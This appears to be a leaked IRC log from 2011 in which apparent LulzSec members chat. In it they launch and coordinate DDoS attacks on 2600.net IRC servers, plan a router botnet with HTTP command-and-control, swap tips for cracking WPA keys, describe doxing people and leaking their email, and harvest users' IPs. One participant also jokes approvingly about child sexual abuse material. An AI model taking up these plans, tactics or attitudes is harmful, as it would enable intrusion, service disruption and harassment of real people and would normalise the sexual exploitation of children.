lolJun 01 07:12:17stormnulled madjackJun 01 07:12:19stormagainJun 01 07:12:20stormlolJun 01 07:12:31sabulolJun 01 07:12:39sabuthey're going to end up losing some serversJun 01 07:13:12sabuI want to own 2600 servers themselvesJun 01 07:14:21Topiarythat would be awesomeJun 01 07:16:42sabutopiary my brother how are youJun 01 07:17:34stormTopiary watch for magickal splitzJun 01 07:17:38Topiarygood Sabu, what's up?Jun 01 07:18:58sabunothing broscope just woke up tired as ballsJun 01 07:22:01joepie92my fucking godJun 01 07:22:07joepie92evilworks raging out of his fucking skullJun 01 07:22:16Topiarywhat about?Jun 01 07:22:25joepie92earlier today he sajoined the entire network to #loungeJun 01 07:22:29joepie92and then did a massive spam/highlightJun 01 07:22:31joepie92of everyone in the channelJun 01 07:22:40joepie92and consecutively got localkilled by me and owenJun 01 07:22:45joepie92now like 10 mins agoJun 01 07:22:48joepie92he starts raging in #opersJun 01 07:22:52joepie92that he is missing some capabilitiesJun 01 07:22:52joepie92as operJun 01 07:22:58joepie92and is apparently not in the operserv admin list anymoerJun 01 07:23:05joepie92starts masshighlighting opersJun 01 07:23:05Topiaryyeah remember that he killed both of us for simply disagreeing with him?Jun 01 07:23:10joepie92raging out of his skullJun 01 07:23:15joepie92despite owen not even being fucking thereJun 01 07:23:16Topiaryin #reporterJun 01 07:23:21Topiaryhe's a hot-tempered childJun 01 07:23:22joepie92and logic tells me that owen was the only person who could do thatJun 01 07:23:26stormi remember owenJun 01 07:23:43joepie92anyhow, after a localkill and some shouting back that he should calm the fuck down, he seems to be more calm nowJun 01 07:23:44joepie92-_-Jun 01 07:23:51Topiaryyou know these chaps with IRC technical prowess have it covered in that areaJun 01 07:23:52joepie92"CAN'T YOU TAKE A JOKE?!?!"Jun 01 07:23:55joepie92seriouslyJun 01 07:23:56Topiarybut outside of that, they're retardedJun 01 07:24:02joepie92if you don't want shit to happen, then don't start shit yourself -_-Jun 01 07:24:14joepie92ughJun 01 07:24:30joepie92inb4 I get localkilled by evilworks againJun 01 07:24:44joepie92crhistJun 01 07:24:45Topiary"agree with me or a z:line you" is evilworks' fodderJun 01 07:24:45joepie92christ*Jun 01 07:24:48joepie92anyhow, /rantJun 01 07:25:21Topiarythis will cheer you up; http://blogs.forbes.com/parmyolson/2011/05/31/interview-with-pbs-hackers-we-did-it-for-lulz-and-justice/Jun 01 07:25:41joepie92lol, parmy is teh winJun 01 07:26:06Topiaryit's fun to upset other journalists by giving parmy exclusivesJun 01 07:26:15Topiaryher original Tupac report got the most views of anyJun 01 07:26:18joepie92loolJun 01 07:26:18Topiaryand it got tweeted by wikileaksJun 01 07:26:21joepie92yeJun 01 07:26:23joepie92and it got referencedJun 01 07:26:25joepie92by all dutch news sourcesJun 01 07:26:29joepie92alsoJun 01 07:26:35joepie92inb4 raeg because it's poptart cat and not nyan catJun 01 07:26:46Topiaryover the last 6 months, we've probably given Parmy more views than she's had in her entire careerJun 01 07:27:23Topiarystill: http://i.imgur.com/DsgWI.jpgJun 01 07:27:27Topiaryour greatest achievement to date?Jun 01 07:27:45joepie92lololJun 01 07:27:49joepie92nyancat in wsjJun 01 07:28:05joepie92also, people help each other I guess :PJun 01 07:28:13joepie92Parmy gets views, anon/lulzsec gets exposureJun 01 07:28:23joepie92and notable sources :DJun 01 07:28:42TopiaryParmy has a friend over at WSJ, she's gonna ask him if they had a good time over the printing of nyan catJun 01 07:28:54Topiaryshe's like our wonderful media outlet 0dayJun 01 07:29:01joepie92looolJun 01 07:29:13lollolololJun 01 07:29:28TopiaryParmy "0day" OlsonJun 01 07:29:32Topiaryshe's a nice ladyJun 01 07:30:13joepie92LulzSec also defaced the official PBS statement in response to the attack. PBS could not be reached for further comment.Jun 01 07:30:14joepie92lolJun 01 07:30:19Topiaryah yesJun 01 07:30:19joepie92becauseyourfurthercommentpagewasdown.jpegJun 01 07:30:27TopiaryI believe that was "LOL FRONTLINE SUCKS COCKS"Jun 01 07:30:33joepie92ahahaJun 01 07:30:38Topiaryhttp://pastehtml.com/view/avg12f6sz.htmlJun 01 07:30:42Topiarythis used to be pbs.org/whiskeyJun 01 07:31:55stormNightmare966 NoNameJun 01 07:31:55storm@Jun 01 07:31:56storm@LulzSec Lemme get this straight... You could do great things like ctaching pedos but you decide attack Sony ._.Jun 01 07:31:59stormROFLMFAOJun 01 07:32:02stormthats epicJun 01 07:32:42stormleave the paedos alone, they already haz it bad enough.Jun 01 07:32:51Topiaryit's actually true though, I dox'd a pedo onceJun 01 07:32:58stormlolJun 01 07:33:00Topiaryprobably helped get him arrestedJun 01 07:33:08stormyuckJun 01 07:33:12Topiary:(Jun 01 07:33:17stormi hate anyone getting arrestedJun 01 07:33:21Topiarywell I never knew if he was arrestedJun 01 07:33:22stormjust a personal view of mine ;xJun 01 07:33:28Topiarydidn't even know he was a pedo until I leaked his hotmailJun 01 07:33:32stormhahahaJun 01 07:33:45Topiaryhe had attachments of CPJun 01 07:33:51Topiaryand chatted up young girlsJun 01 07:34:50stormat least he had good tasteJun 01 07:34:51storm;xJun 01 07:34:59stormgirls = way to beJun 01 07:35:19stormthere are indefinite under age girls on motherless.comJun 01 07:39:52*	storm see's everyone fappingJun 01 07:43:35lol:/Jun 01 07:46:54stormlolJun 01 07:47:44*	lol helpsJun 01 07:48:53stormOMGJun 01 07:48:54stormsoJun 01 07:49:01stormmy gigabit box i owned a few days agoJun 01 07:49:06stormhas a publ;ic key to another oneJun 01 07:49:09stormfucking ownedJun 01 07:49:09storm;xJun 01 07:49:27lolnice :DJun 01 07:49:27Topiarymore cannons!Jun 01 07:49:39Topiaryyou're definitely our LulzSec cannonfire officerJun 01 07:49:46lol2xDATAFLOWJun 01 07:49:54Topiarykayla is our assassin/spyJun 01 07:50:02Topiarywe dock in ports and she immerses =Jun 01 07:50:04Topiaryand eliminatesJun 01 07:50:10loli also bake cookies :3Jun 01 07:50:52lolcurrently 46 boats in the harbourJun 01 07:51:16lol* [^_^]-70335 ([^_^]-70335@HA-ek9.ljf.k5jhin.IP) QuitJun 01 07:51:21lol45*Jun 01 07:54:07*	Topiary has quit (Ping timeout: 121 seconds)Jun 01 07:57:54lolfiring cannons @ collective.2600.netJun 01 07:58:46joepie92stormi hate anyone getting arrestedJun 01 07:58:48joepie92agreedJun 01 07:58:54joepie92last resort imoJun 01 07:59:17storm:]Jun 01 07:59:27lolC:\Documents and Settings\kayla&gt;ping collective.2600.netJun 01 07:59:27lolPinging collective.2600.net [208.111.35.75] with 32 bytes of data:Jun 01 07:59:27lolRequest timed out.Jun 01 07:59:27lolRequest timed out.Jun 01 07:59:27lolRequest timed out.Jun 01 07:59:27lolRequest timed out.Jun 01 07:59:27lolPing statistics for 208.111.35.75:Jun 01 07:59:27lolPackets: Sent = 4, Received = 0, Lost = 4 (100% loss),Jun 01 07:59:27lolC:\Documents and Settings\kayla&gt;Jun 01 07:59:30lolloooooooooooooolJun 01 07:59:36stormEWWWWWWWWWJun 01 07:59:41loldos'd with 45 botsJun 01 07:59:41stormCMD PROMPTJun 01 07:59:44stormZOMGJun 01 07:59:46stormI DIEDJun 01 07:59:50lollolJun 01 07:59:53stormlolJun 01 07:59:53storm:xJun 01 07:59:56lol:DJun 01 08:00:24*	joepie92 thinks kayla MUST have modded her terminal to look like cmdJun 01 08:03:14stormlollJun 01 08:11:13*	Topiary (t@HA-31n.h6t.9puaba.IP) has joined #pure-eliteJun 01 08:12:48joepie92if you're boredJun 01 08:12:49joepie92view-source:www.easyhits4u.com/index.cgi?warning=haiJun 01 08:12:52joepie92erJun 01 08:12:56joepie92http://www.easyhits4u.com/index.cgi?warning=haiJun 01 08:13:11lolwhats tht ;p?Jun 01 08:13:13*	joepie92 smells XSSJun 01 08:13:46joepie92:DJun 01 08:14:12stormhey kaylaJun 01 08:14:15stormcan i pm jooJun 01 08:15:06lolsure :DJun 01 08:24:55*	voodoo has quit (Connection closed)Jun 01 08:36:38*	voodoo (voodoo@HA-32o.s8p.durho2.IP) has joined #pure-eliteJun 01 08:51:04joepie92some peopleJun 01 08:51:05joepie92are so fucking stupidJun 01 08:51:06joepie92"stupid" in the sense that they assume the current systems are the only way to go, that they will judge any system that works differently as "bad" or "inferior", and saying that you would be "throwing away hundreds of years of knowledge", ignoring the "tested systems"Jun 01 08:51:07joepie92and for ease of complaint, ignoring that those "tested systems" have fallen over and over againJun 01 08:51:16joepie92http://www.quora.com/Is-the-cryptocurrency-Bitcoin-a-good-ideaJun 01 08:51:20joepie92read the top commentJun 01 08:56:47loluname -aJun 01 08:56:49loloopsJun 01 08:57:35stormlolJun 01 08:57:36storm:DJun 01 08:57:42stormi do that a lotJun 01 08:57:50stormcause my terminals are transparentJun 01 08:58:25*	Topiary has quit (Quit: sec)Jun 01 09:03:10joepie92lolJun 01 09:15:19*	Topiary (t@HA-d98.pu6.75e5ku.IP) has joined #pure-eliteJun 01 09:35:45*	anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-eliteJun 01 09:35:52*	pwnsauce (pwnsauce@HA-pin.jre.pn6gun.IP) has joined #pure-eliteJun 01 09:35:58*	anonny is now known as kl0psJun 01 09:36:06kl0pshello o/Jun 01 09:36:14pwnsauceheuJun 01 09:36:17pwnsauce*heyJun 01 09:36:54pwnsaucewhass happening?Jun 01 09:37:35kl0psnothing, all is fine,... perfect ;)Jun 01 09:37:36kl0pssupJun 01 09:37:37kl0ps?Jun 01 09:48:28pwnsaucenot muchJun 01 09:55:02TopiaryI'm celebration of our whiskey page I am now using a Moldova server locationJun 01 09:55:04Topiary*InJun 01 10:04:10joepie92buyvm gone againJun 01 10:08:57-NickServ-	This nickname is registered and protected.  If it is yourJun 01 10:08:57-NickServ-	nick, type /msg NickServ IDENTIFY password.  Otherwise,Jun 01 10:08:57-NickServ-	please choose a different nick.Jun 01 10:15:46*	kl0ps has quit (Connection closed)Jun 01 10:28:43*	kay (parr0t@HA-p7h.2se.thhlfj.IP) has joined #pure-eliteJun 01 10:29:40*	lol has quit (Ping timeout: 121 seconds)Jun 01 10:38:17*	kay is now known as lolJun 01 10:55:11*	pwnsauce has quit (Ping timeout: 121 seconds)Jun 01 11:09:22*	anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-eliteJun 01 11:09:33*	anonny is now known as kl0psJun 01 11:31:49*	kl0ps has quit (Quit: Leaving)Jun 01 12:13:58*	pwnsauce (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure-eliteJun 01 12:19:19pwnsauce:D\-&lt;Jun 01 12:19:25pwnsauce:D|-&lt;Jun 01 12:19:28pwnsauce:D/-&lt;Jun 01 12:19:34Topiary^^^^^^^^^^^^^^^^^^Jun 01 12:19:39Topiary_________________________Jun 01 12:19:45Topiary____________________________________________________________________Jun 01 12:19:54Topiary8=========================DJun 01 12:20:03Topiaryyour stick dude fell into a sea of cocksJun 01 12:20:35joepie92lololJun 01 12:20:43*	joepie92 does some shameless plugging for bitcoinJun 01 12:21:37*	Neuron (Neuron@HA-26h.345.a84vd3.IP) has joined #pure-eliteJun 01 12:21:40neurono/Jun 01 12:23:05joepie92lolwatJun 01 12:23:06joepie92guiseJun 01 12:23:06joepie92http://nf.dyndns.org/?poll=3Jun 01 12:23:16joepie92I seriously got more bitcoin donationsJun 01 12:23:19joepie92than pioneer oneJun 01 12:23:56neuronlmfao wowJun 01 12:23:57neuronniceJun 01 12:24:07joepie92I googled the anonnews addressJun 01 12:24:08joepie92and that came upJun 01 12:24:08joepie92xDJun 01 12:26:10neuronhmmJun 01 12:26:16neuronping dosen't like to be a background processJun 01 12:28:01joepie92lololJun 01 12:29:04neuronlol: you on?Jun 01 12:29:12lolyeh :DJun 01 12:29:37neurontalked to [redacted] about everythingJun 01 12:29:44neuronbuilding a cnc system for the busybox'sJun 01 12:29:52neuronlul for bash bot :D XDJun 01 12:30:01neuronif you can send me that list of all of them that would be awesomeJun 01 12:30:03[redacted]supJun 01 12:30:08neuronhey [redacted] o/Jun 01 12:30:33[redacted]just woke up :]Jun 01 12:32:00*	lol has quit (A TLS packet with unexpected length was received.)Jun 01 12:32:11*	lol (parr0t@HA-678.11n.cc0br2.IP) has joined #pure-eliteJun 01 12:32:19neuronwb lolJun 01 12:32:28lol:)Jun 01 12:32:31lolty &lt;333Jun 01 12:32:37neuronlol: do you have the list on you?Jun 01 12:32:58lolno it's on my netbook, i should be able to get it tonightJun 01 12:33:04neuronlol: Idk if you left but i was talking to [redacted] and we decided to work on a small cnc type bot with the busybox'sJun 01 12:33:07neuronbashbot XDJun 01 12:33:08loldid many from tht other list work?Jun 01 12:33:18neuronabout 15-20 :/Jun 01 12:33:39lolthe other list i have is just as old as thtJun 01 12:33:49lolthe problem is tht range is dynamicJun 01 12:34:01lolso it has to be re scanned regularyJun 01 12:34:08loli got some good boxes to scan fromJun 01 12:34:16lolill just scan the range againJun 01 12:34:18neuronthats fine. Can you rescan the range?Jun 01 12:34:24lolyeh :)Jun 01 12:34:38lolill set some screen sessions up scanning later tonight :)Jun 01 12:34:54neuroncool once we have the bot in place it won't matter what ip there on :) there just going to pull a command from a webserver every now and thenJun 01 12:35:15lol:)Jun 01 12:35:30loli just had a hard time getting anything i compile to execute on themJun 01 12:35:39lolevenn such simple mips asmJun 01 12:35:57neuronyeah thats why im going the bash route XD i couldn't get anything to run on them as wellJun 01 12:36:08loli was hoping to just cross compile a kaiten but it's not tht simple hahahahaaJun 01 12:36:25lolUnexpected ) error all the timeJun 01 12:37:22lolnow if we could remote update them, we could modify a firmwareJun 01 12:37:35lolbut i dont think thats possibleJun 01 12:37:41neuronnopeJun 01 12:37:42[redacted]keep it simpleJun 01 12:37:44[redacted]write the bot in bashJun 01 12:37:48[redacted]using HTTP for CnCJun 01 12:37:50lolbut people have modified themJun 01 12:37:55loli found one with php on onceJun 01 12:38:22lolsome of them have aspx scripts on themJun 01 12:38:35lolthey're really weird thingsJun 01 12:38:43neuronyeah but the aspx scripts only workfor localJun 01 12:38:46lolbut they only have like 2MB memoryJun 01 12:38:48neuronintranetJun 01 12:38:53neuronso there 192 addressJun 01 12:38:57pwnsaucehey heyJun 01 12:39:03neurono/ hey pwnsauceJun 01 12:39:24pwnsaucewhats up?Jun 01 12:39:27pwnsaucekaiten botting?Jun 01 12:39:32pwnsauce* MIPS router bottinh?Jun 01 12:39:33pwnsauceokJun 01 12:39:45pwnsauceKayla - I have some good code hereJun 01 12:39:48pwnsaucea HTTP botJun 01 12:39:57pwnsaucenow what we can do is try cross compile thatJun 01 12:40:06pwnsauceelse,  have a perl bot we can convert to BASHJun 01 12:40:08pwnsauceor ASHJun 01 12:40:18pwnsauce* a HTTP perl botJun 01 12:40:29neuronyupJun 01 12:40:31neuronMIPS bottinJun 01 12:40:39pwnsauceIve been researching itJun 01 12:40:44pwnsaucecan they run shell scripts?Jun 01 12:40:46neuroni was trying to find PSYBOTJun 01 12:40:49neuronpwnsauce: yeahJun 01 12:40:51pwnsauceokJun 01 12:40:58pwnsauceonesecJun 01 12:41:03pwnsauceinb4linkageJun 01 12:41:07neuronlolJun 01 12:41:13neuronif you have a bot ill love you forever XDJun 01 12:41:34neuronif not im going to have to write a bash bot and i hate bashJun 01 12:42:26pwnsaucehttp://machinized.com/products.phpJun 01 12:42:29pwnsaucelook atJun 01 12:42:32pwnsauce"Hybrid"Jun 01 12:42:34pwnsauceits PerlJun 01 12:42:43pwnsaucenow I can try re writing some of itJun 01 12:42:51lolbut we can't install perl on them xDJun 01 12:43:00pwnsaucekayla - i knowJun 01 12:43:05pwnsaucebut perl is closer to BASHJun 01 12:43:07pwnsaucethan CJun 01 12:43:08pwnsauce:DJun 01 12:43:13*	Neuron facepalmJun 01 12:43:17pwnsaucealso QuadNXJun 01 12:43:19pwnsauceis in CJun 01 12:43:29neuroncan't compile for themJun 01 12:43:55pwnsauce*thinks*Jun 01 12:43:58pwnsaucebrb 1 secJun 01 12:44:06pwnsaucemy brains not working right I thinkJun 01 12:44:18loli think we're just going to have to work with whats already on themJun 01 12:44:26lolsee i know people who said they've botted themJun 01 12:44:30lolbut no ones proved itJun 01 12:44:52loli think we're just going to have to make a loader for themJun 01 12:45:07lolnow i remember you can load CISCO routers in to IRC using TELENTJun 01 12:45:17loli wonder if the same can be done for theseJun 01 12:45:40lollet me find itJun 01 12:46:13pwnsauceok! I have found an IRC bot in BASH I thinkJun 01 12:46:27*	Neuron_ (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure-eliteJun 01 12:46:43&lt;neuron_&gt;	lol gonna be one of those days were my connection hates meJun 01 12:47:00pwnsaucehttp://linux.softpedia.com/get/Communications/Chat/BashBot-24097.shtmlJun 01 12:47:10pwnsaucehttp://linux.softpedia.com/get/Programming/Libraries/TheBOT-25778.shtmlJun 01 12:47:49pwnsaucenow IDK if they are any useJun 01 12:47:50&lt;neuron_&gt;	looking at itJun 01 12:48:00*	Neuron has quit (Ping timeout: 121 seconds)Jun 01 12:48:08&lt;neuron_&gt;	don't think we want irc for this oneJun 01 12:48:16pwnsauceaye, IRC was just an ideaJun 01 12:48:31lolthis is an old loader my friend wrote ages ago, it's for loading bots from a list of CISCO ip's http://pastebin.com/Y1E1QCgBJun 01 12:48:52lolwe need something of the same effectJun 01 12:49:50&lt;neuron_&gt;	http://pastebin.com/uqh4qEzJJun 01 12:49:57&lt;neuron_&gt;	this is the lame code im playing with right nowJun 01 12:50:16&lt;neuron_&gt;	i hate bash scripting because of its annoying tendencys so meh code sucksJun 01 12:50:40joepie92http://www.thinq.co.uk/2011/6/1/nato-report-threatens-persecute-anonymous/Jun 01 12:50:43joepie92we be terrorists nao guiseJun 01 12:50:56&lt;neuron_&gt;	were not anonymous :)Jun 01 12:52:01pwnsaucebrb :) ad Ill find Psyb0t src if I canJun 01 12:52:23lol"General Rapporteur Lord Jopling"Jun 01 12:52:28&lt;neuron_&gt;	lol gl if you can that would be amazingJun 01 12:52:32loltht has to be a troll/hack ala tupac?Jun 01 12:52:36loltht name can't be real xDJun 01 12:52:46pwnsauceLOL kayla - didnt see thatJun 01 12:52:58pwnsauceand Neuron_ if its out there its MINE nowJun 01 12:52:59pwnsaucebrbzJun 01 12:53:03lolRapporteur Jopling xD wtfJun 01 12:53:06&lt;neuron_&gt;	XJun 01 12:53:07&lt;neuron_&gt;	dJun 01 13:04:19&lt;neuron_&gt;	hmm linux dosen't allow multiple ping process's :/Jun 01 13:04:59sabuwtf you taking about loJun 01 13:05:01sabuyes it doesJun 01 13:05:16&lt;neuron_&gt;	ping the same host with x amoutn of ping process?Jun 01 13:05:30sabuping google.com &amp;Jun 01 13:05:33&lt;neuron_&gt;	so ping google.com -c 10&amp; &lt;&lt; calling that 30 timesJun 01 13:05:34sabuping google.com &amp;Jun 01 13:05:37sabuyesJun 01 13:05:41sabuyou can do that all dayJun 01 13:05:42&lt;neuron_&gt;	results in one ping process using htopJun 01 13:05:58&lt;neuron_&gt;	*im using htop to view running process*Jun 01 13:06:26&lt;neuron_&gt;	wait &lt;.&lt; derpJun 01 13:07:46&lt;neuron_&gt;	my for loop using 'seq 30' wasn't workingJun 01 13:11:39stormhiiJun 01 13:11:44&lt;neuron_&gt;	o/ stormJun 01 13:12:34storm^.^Jun 01 13:15:29sabustormJun 01 13:15:47*	Neuron_ has quit (Connection closed)Jun 01 13:16:08*	Neuron (Neuron@HA-3hr.345.a84vd3.IP) has joined #pure-eliteJun 01 13:19:38pwnsauceNeuron - got something inteeresting http://www.woodmann.com/forum/archive/index.php/t-12678.htmlJun 01 13:19:41stormyes sabu?Jun 01 13:19:48pwnsauceits got a lnk to a binJun 01 13:19:56neuronpwnsauce: tried both link :P nothingJun 01 13:20:08Topiaryhey storm you wanna raep collective?Jun 01 13:20:11neuroni couldn't even find a working binary of it :(Jun 01 13:22:05stormyeah gimme a fewJun 01 13:22:39joepie92regex for matching TOC entries from RFCsJun 01 13:22:40joepie92([0-9]+\.)*[0-9]+[.]? [^.0-9]*Jun 01 13:22:52joepie92if someone happens to need itJun 01 13:22:52joepie92:PJun 01 13:24:05stormjust woke upJun 01 13:24:14TopiaryhehJun 01 13:24:25sabustormJun 01 13:24:31sabuget your boxes readyJun 01 13:24:35sabuI want you to hit them for a bitJun 01 13:25:29sabuyou there niggy?Jun 01 13:27:25*	Neuron has quit (Ping timeout: 121 seconds)Jun 01 13:29:59sabustorm hit their ircds againJun 01 13:30:04sabutake out collectionJun 01 13:30:05sabuand madjackJun 01 13:34:44joepie92- madjack.2600.net --------------------------------- | Users:   104 (19.6%)Jun 01 13:34:44joepie92-  '- blackbeard.2600.net -------------------------- | Users:     0 (0.0%)Jun 01 13:34:44joepie92-      |- collective.2600.net ---------------------- | Users:   252 (47.5%)Jun 01 13:34:44joepie92-      |- djslocker.2600.net ----------------------- | Users:   166 (31.3%)Jun 01 13:34:44joepie92-      '- services.2600.net ------------------------ | Users:     9 (1.7%)Jun 01 13:37:04*	Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure-eliteJun 01 13:37:08neuronbackJun 01 13:37:09neurono/Jun 01 13:37:14sabujeaJun 01 13:38:03pwnsauceNeuron - hows it allw orking out?Jun 01 13:38:06pwnsauceIm thinking hereJun 01 13:38:09pwnsaucehave SOME ideasJun 01 13:38:15pwnsauceokJun 01 13:38:57neuronpwnsauce: we dont have alot to work with.. We can telnet,ssh,ping,wget &lt;&lt; from the busybox'sJun 01 13:39:17neuronand i just tried to put my current work on the busybox and errors so yay \o/Jun 01 13:44:41pwnsauceok, we can do thoseJun 01 13:44:43pwnsauceperhapsJun 01 13:44:45pwnsauceIDEAJun 01 13:44:50pwnsaucewgetraepingJun 01 13:45:07pwnsaucewget and pipe putput to /dev/null (or equivaent)Jun 01 13:45:22pwnsaucehave that in a loopJun 01 13:45:34pwnsauceso it just... keeps on wgettingJun 01 13:45:40pwnsaucehmmm one sec brb had ideaJun 01 13:45:52sabuyou can technically do slowloris attacks with wgetJun 01 13:46:51neuronpwnsauce: yeah we were thinking about that. the trick is just to get a simple cnc type system goingJun 01 13:48:57neuronim fighting with a bad subsitution error right on the busybox side. On my side works fine so few momentsJun 01 13:51:53pwnsauceah okJun 01 13:52:01pwnsaucewhat C&amp;C we looking at?Jun 01 13:54:34neuronjust a simple webserver style oneJun 01 13:54:45neuronscript pulls down a "command.txt" and parses it for commandsJun 01 13:54:56pwnsauceaaah :)Jun 01 13:55:05pwnsauceand then you "Update" command.txtJun 01 13:55:10neuronyupJun 01 13:55:11pwnsaucevia a web interface?Jun 01 13:55:21neuronnot a web interface but im sure we could do thatJun 01 13:55:29pwnsauceI have something hereJun 01 13:55:31neuronright now its just getting teh bash script to work on busyboxJun 01 13:55:43stormhey pwnsauceJun 01 13:55:44storm:]Jun 01 13:55:46pwnsaucea remote admin tool that uses th same mechanism - updates a command.txt fileJun 01 13:55:49pwnsaucehey Storm :DJun 01 13:55:54stormsuppieJun 01 13:56:05pwnsaucenm, working on some stuffJun 01 13:56:14pwnsaucemy *nix partition nuked tho  :/Jun 01 13:56:28stormyuckJun 01 13:58:37*	Sabu gives channel operator status to Neuron Topiary voodoo pwnsauceJun 01 13:58:37*	Sabu gives channel operator status to lolJun 01 13:58:39sabuthanks storJun 01 13:58:58storm:pJun 01 13:59:08stormwhatcha thanking me forJun 01 13:59:11stormseeing pings yet?Jun 01 13:59:59neuronsighJun 01 14:00:04neuron./bot.sh: 60: [[: not foundJun 01 14:00:10neuronline 60 = doneJun 01 14:05:58[redacted]backJun 01 14:07:06*	also-cocks (pwnsauce@HA-q1a.9e1.pn6gun.IP) has joined #pure-eliteJun 01 14:07:43*	pwnsauce has quit (Ping timeout: 121 seconds)Jun 01 14:07:50*	also-cocks is now known as pwnsauceJun 01 14:07:56*	Neuron has quit (Connection closed)Jun 01 14:08:18*	Neuron (Neuron@HA-s9t.345.a84vd3.IP) has joined #pure-eliteJun 01 14:08:42pwnsaucemy connection werntJun 01 14:10:08*	Neuron has quit (Quit: leaving)Jun 01 14:17:53[redacted]do all of these little bastardsJun 01 14:17:57[redacted]have a web directory?Jun 01 14:28:00pwnsauce[redacted] - I dont knw... IIRC they have a web control interface of some kindJun 01 14:28:28pwnsauceRecursion! CANHAS SONYLULZ NAO PL0X!Jun 01 14:28:36pwnsaucePM MEDIAFUCK LINKAGE!Jun 01 14:29:14[redacted]then its simpleJun 01 14:29:17[redacted]we write the bot in ASPJun 01 14:29:18[redacted]???Jun 01 14:29:19[redacted]profitJun 01 14:32:36joepie92what's the quickest way to crack a WPA-PSK keyJun 01 14:32:46joepie92or otherwise get access to a router using WPA-PSKJun 01 14:32:46joepie92?Jun 01 14:32:53*	joepie92 never does that shitJun 01 14:32:56*	trollpoll (trollpoll@HA-00r.11n.cc0br2.IP) has joined #pure-eliteJun 01 14:33:04joepie92ohai trollpollJun 01 14:33:08*	joepie92 repeats questionJun 01 14:33:12trollpollhi!Jun 01 14:33:12joepie92joepie92what's the quickest way to crack a WPA-PSK keyJun 01 14:33:12joepie92joepie92or otherwise get access to a router using WPA-PSKJun 01 14:33:32trollpollhm, rainbow tables?Jun 01 14:34:25joepie92idkJun 01 14:34:31joepie92I have absolutely no experience with shit like thisJun 01 14:34:36joepie92also, the guy who is asking has 18kbps internetJun 01 14:34:39trollpollbut, if is this kind of routers pre-configured with WPA key obtained automatically using MAC &amp; ESSIDJun 01 14:34:41joepie92so rainbow tables might not be the best idea...Jun 01 14:34:44trollpollcould be easy...Jun 01 14:34:50joepie92ahJun 01 14:34:50trollpollwhat kind of essid is it?Jun 01 14:34:51joepie92thomsonsJun 01 14:34:53joepie921 secJun 01 14:35:06trollpollin spain the jazztel_XXXX are quickly crackeableJun 01 14:35:11trollpolland WLAN_XX tooJun 01 14:35:15trollpolland WLAN_XXXX tooJun 01 14:35:20joepie92let me askJun 01 14:35:53trollpollall of them are calculable having the mac and the essid, but if the user has already changed the wpa... it could be very hard to crackJun 01 14:36:13pwnsaucehmmmmmJun 01 14:36:19pwnsaucecapture the handshakeJun 01 14:36:20trollpollanyway, i've tried to crack an wpa twice, and without good results...Jun 01 14:36:27pwnsauceupload to online cracker serviceJun 01 14:36:41trollpolluse gerix, is a very good tool to do soJun 01 14:36:42joepie92pwnsauce: got a link to a cracking service?Jun 01 14:37:12joepie92Huawei_HG521Jun 01 14:37:18joepie92is the nameJun 01 14:37:19trollpollhur...Jun 01 14:37:29trollpollso it looks like a preconfigured name...Jun 01 14:37:33trollpolllets see...Jun 01 14:38:47trollpollhmm, hg521 is the model of the routerJun 01 14:39:11joepie92ahJun 01 14:39:14joepie92:/Jun 01 14:40:37trollpolli think that penetrate is an android tool to do this... (calculate the default wpa of some routers)Jun 01 14:41:10pwnsaucejoepie92 - ill find oneJun 01 14:41:17trollpollhttp://underdev.org/penetrate/Jun 01 14:41:17pwnsauceand I have penetrate but cant make it workJun 01 14:41:39trollpollthe thomson is calculable...Jun 01 14:41:53trollpollSpeedTouch, Thomson, Orange, DMax, BBox, Infinitum, Otenet, CytaJun 01 14:42:11trollpolldo u have an android? :PJun 01 14:42:24pwnsauceI has...Jun 01 14:42:45joepie92I don'tJun 01 14:42:46joepie92lolJun 01 14:43:28trollpoll(i do have one too)...Jun 01 14:43:42trollpolldo you use tor (orbot) for android pwnsauce ?Jun 01 14:43:48trollpollis better than expected...Jun 01 14:50:24joepie92heyJun 01 14:50:24joepie92guysJun 01 14:50:27joepie92if anyone is interestedJun 01 14:50:31joepie92in the nonynews guyJun 01 14:50:35joepie92who was posting shit on wikiaJun 01 14:50:35joepie92- Whois list of nonyNewsJun 01 14:50:35joepie92- Realname: nonyNewsJun 01 14:50:35joepie92- Hostmask: nonyNews!~anon@server106963.santrex.net *Jun 01 14:50:35joepie92- nonyNews is on: #lulzsecJun 01 14:50:35joepie92- Server: collective.2600.net (Arghhh, Scourge of the seven seas!)Jun 01 14:50:35joepie92- End of /WHOIS list.Jun 01 14:50:40joepie92:&gt;Jun 01 14:50:47joepie92@ TopiaryJun 01 14:51:10TopiaryindeedJun 01 14:51:28joepie92fucking idiots not realizing your shit doesn't get masked on 2600...Jun 01 14:51:35*	joepie92 does anonops ip matchJun 01 14:51:57pwnsaucetrollpoll - I dont use my android to access webJun 01 14:52:13pwnsauceI only use to breal WEP key on EircomJun 01 14:52:18Topiaryjoepie92, can I make them realize we have all their IPs?Jun 01 14:52:30joepie92mmmmJun 01 14:52:33joepie92let me see the userlist firstJun 01 14:52:38joepie92to see if I recognize any fishy namesJun 01 14:54:39joepie92oops :3Jun 01 14:54:54Topiaryyou started it|!Jun 01 14:54:57TopiaryhehJun 01 14:56:03joepie92mehJun 01 14:56:10joepie92I was feeling a bit juvenileJun 01 14:56:11joepie92:DJun 01 14:57:38joepie92&lt;awinee&gt;joepie91 has more skill then youJun 01 14:57:39joepie92loldJun 01 14:57:40joepie92lold hardJun 01 14:58:04joepie92because whoising someoneJun 01 14:58:06joepie92is in any way a skillJun 01 14:58:06joepie92lolJun 01 14:59:19joepie92&lt;thejackal&gt;holy shit this asshole never shuts upJun 01 14:59:20joepie92&lt;thejackal&gt;it was bad enough seeing the trash you spill on twitter Awinee, now you come here?Jun 01 14:59:21joepie92lololJun 01 14:59:55trollpollwhere are you? at 2600?Jun 01 15:00:09joepie92yaJun 01 15:00:10joepie92lolJun 01 15:00:20trollpolljust trolling? or doing something?Jun 01 15:01:01joepie92GODJun 01 15:01:02joepie92I FUCKING HATEJun 01 15:01:03joepie92THESEJun 01 15:01:06joepie92WIBYA TOOLBARSJun 01 15:01:11joepie92seriouslyJun 01 15:01:14joepie92I try to read a blogJun 01 15:01:16joepie92and I get 23512351235 popupsJun 01 15:01:17joepie92sayingJun 01 15:01:20joepie92you can tweet thisJun 01 15:01:22joepie92you can FB like thisJun 01 15:01:23joepie92you can blahJun 01 